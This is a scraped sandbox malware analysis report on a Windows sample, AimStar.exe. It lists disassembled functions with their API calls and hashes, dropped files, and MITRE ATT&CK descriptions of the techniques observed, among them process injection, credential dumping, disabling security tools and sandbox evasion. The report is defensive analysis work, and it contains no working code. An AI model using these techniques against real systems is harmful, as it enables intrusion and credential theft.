Opcode ID: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
Instruction ID: d06481189cfeebca4fa0ddfeffa3878d8197837d5a61ff9d61fecb8f28eb26ac
Opcode Fuzzy Hash: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
Instruction Fuzzy Hash: FC218453908F8582EB419F29E5510B86370FB98BA8B54A322DF9D53656EF38E5E98300

Function 00007FF71398915C Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FF7139891CA
new.LIBCMT ref: 00007FF7139891F2

Memory Dump Source

Source File: 00000058.00000002.2319158388.00007FF713951000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF713950000, based on PE: true

Associated: 00000058.00000002.2319133618.00007FF713950000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319218457.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319251920.00007FF7139D8000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319277999.00007FF7139D9000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139DA000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139E4000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139EE000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139F6000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319416411.00007FF7139F8000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319448367.00007FF7139FE000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_88_2_7ff713950000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a1261cd3339fabc38624afcbcdbd896567f3adcd0b5f50981079364417382e6
Instruction ID: f1f7f0f93a00efdeefc3801954c5845ac86dc054621166f1964abae62591acd7
Opcode Fuzzy Hash: 2a1261cd3339fabc38624afcbcdbd896567f3adcd0b5f50981079364417382e6
Instruction Fuzzy Hash: EC118131509F8182EA84BB55A5013ADF2E4EF85BA8FA40634E6AD177E6DE3CD0558320

Function 00007FF713972440 Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE ref: 00007FF713972480
GetLastError.KERNEL32 ref: 00007FF71397248D

Memory Dump Source

Source File: 00000058.00000002.2319158388.00007FF713951000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF713950000, based on PE: true

Associated: 00000058.00000002.2319133618.00007FF713950000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319218457.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319251920.00007FF7139D8000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319277999.00007FF7139D9000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139DA000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139E4000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139EE000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139F6000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319416411.00007FF7139F8000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319448367.00007FF7139FE000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_88_2_7ff713950000_rar.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
Instruction ID: f0c6f1ceac3050d898753a636cb8f21d17a971a456e788d6d03b08feb17efb53
Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
Instruction Fuzzy Hash: F7016162A28E8291EFA4AF29E445279A361EB447BDF944331E17D111E5CF3CD58ECB20

Function 00007FF71399B3F0 Relevance: 3.0, APIs: 2, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(00000000,00007FF713997F72), ref: 00007FF71399B41E
LoadLibraryExW.KERNELBASE ref: 00007FF71399B449

Memory Dump Source

Source File: 00000058.00000002.2319158388.00007FF713951000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF713950000, based on PE: true

Associated: 00000058.00000002.2319133618.00007FF713950000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319218457.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319251920.00007FF7139D8000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319277999.00007FF7139D9000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139DA000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139E4000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139EE000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139F6000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319416411.00007FF7139F8000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319448367.00007FF7139FE000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_88_2_7ff713950000_rar.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
Instruction ID: 241a79c07aa2fbad9b1956dcf6f7ab4fb5179666c0eb1305311518af69e4976d
Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
Instruction Fuzzy Hash: 31F03C61B28D8186F6F0BB10E8153FAE364BF9C798FC04531E9CD92755DE2CD2488B20

Function 00007FF7139971FC Relevance: 1.9, APIs: 1, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000058.00000002.2319158388.00007FF713951000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF713950000, based on PE: true

Associated: 00000058.00000002.2319133618.00007FF713950000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319218457.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319251920.00007FF7139D8000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319277999.00007FF7139D9000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139DA000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139E4000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139EE000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139F6000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319416411.00007FF7139F8000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319448367.00007FF7139FE000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_88_2_7ff713950000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26212a7374a519e65816826816287aa1d401c57b64cad0e682888ddaeac3bbf1
Instruction ID: df2978acbd48da8abb48788a03a33742d8a102495b3ede6945cffcbb358e4c55
Opcode Fuzzy Hash: 26212a7374a519e65816826816287aa1d401c57b64cad0e682888ddaeac3bbf1
Instruction Fuzzy Hash: 9EE1F421A0CE8281FFA0BA2494452BEA359EF45BACF840135DE4D2B7D6DE3DE449C731

Function 00007FF7139572C4 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF71398915C: new.LIBCMT ref: 00007FF7139891CA
Part of subcall function 00007FF71398915C: new.LIBCMT ref: 00007FF7139891F2

new.LIBCMT ref: 00007FF7139573DE

Memory Dump Source

Source File: 00000058.00000002.2319158388.00007FF713951000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF713950000, based on PE: true

Associated: 00000058.00000002.2319133618.00007FF713950000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319218457.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319251920.00007FF7139D8000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319277999.00007FF7139D9000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139DA000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139E4000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139EE000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139F6000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319416411.00007FF7139F8000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319448367.00007FF7139FE000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_88_2_7ff713950000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bb3814317599b382789f148ce2d732778e883356128849b78d26c8b7eeb0fce
Instruction ID: 4c339a5f515ea9a0174d2c4c41c8d66af67053cdf37765ba59d3b9ca991193c0
Opcode Fuzzy Hash: 7bb3814317599b382789f148ce2d732778e883356128849b78d26c8b7eeb0fce
Instruction Fuzzy Hash: 21513673528BD195E700AF24A8451ED37A8F744FA8F58423ADA880B79ADF389165C731

Function 00007FF7139B231C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7139B2344

Part of subcall function 00007FF7139B24D4: GetModuleHandleExW.KERNEL32 ref: 00007FF7139B24F4
Part of subcall function 00007FF7139B24D4: GetProcAddress.KERNEL32 ref: 00007FF7139B250A
Part of subcall function 00007FF7139B24D4: FreeLibrary.KERNEL32 ref: 00007FF7139B252F

Memory Dump Source

Source File: 00000058.00000002.2319158388.00007FF713951000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF713950000, based on PE: true

Associated: 00000058.00000002.2319133618.00007FF713950000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319218457.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319251920.00007FF7139D8000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319277999.00007FF7139D9000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139DA000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139E4000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139EE000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139F6000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319416411.00007FF7139F8000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319448367.00007FF7139FE000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_88_2_7ff713950000_rar.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
Instruction ID: 4433c0ac8ae78da4ff9300b30e4b3edd8d9f620d32422343ffbe19d92d2a0238
Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
Instruction Fuzzy Hash: 0A41D121A19E4382FBE8BB109450538A691EF84B78FC44475D94D2BAD9DF3CE98C8760

Function 00007FF7139838A4 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000058.00000002.2319158388.00007FF713951000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF713950000, based on PE: true

Associated: 00000058.00000002.2319133618.00007FF713950000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319218457.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319251920.00007FF7139D8000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319277999.00007FF7139D9000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139DA000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139E4000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139EE000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139F6000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319416411.00007FF7139F8000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319448367.00007FF7139FE000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_88_2_7ff713950000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
Instruction ID: b1fd1909d7eeed2ff6bc02ecc118f20e30e44ae7046f75e7700b1dd441f6b7c1
Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
Instruction Fuzzy Hash: 4AE04FD4F19B0A41EDE83622189307982401F96BA8ED458B9CC1E26392DC1DA05D5B20

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report AimStar.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Data Obfuscation

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\ \Display (1).png

C:\Users\user\AppData\Local\Temp\1KgHr.zip

C:\Users\user\AppData\Local\Temp\MpCmdRun.log

C:\Users\user\AppData\Local\Temp\RES1C05.tmp

C:\Users\user\AppData\Local\Temp\_MEI72842\VCRUNTIME140.dll

C:\Users\user\AppData\Local\Temp\_MEI72842\_bz2.pyd

Windows Analysis Report
AimStar.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

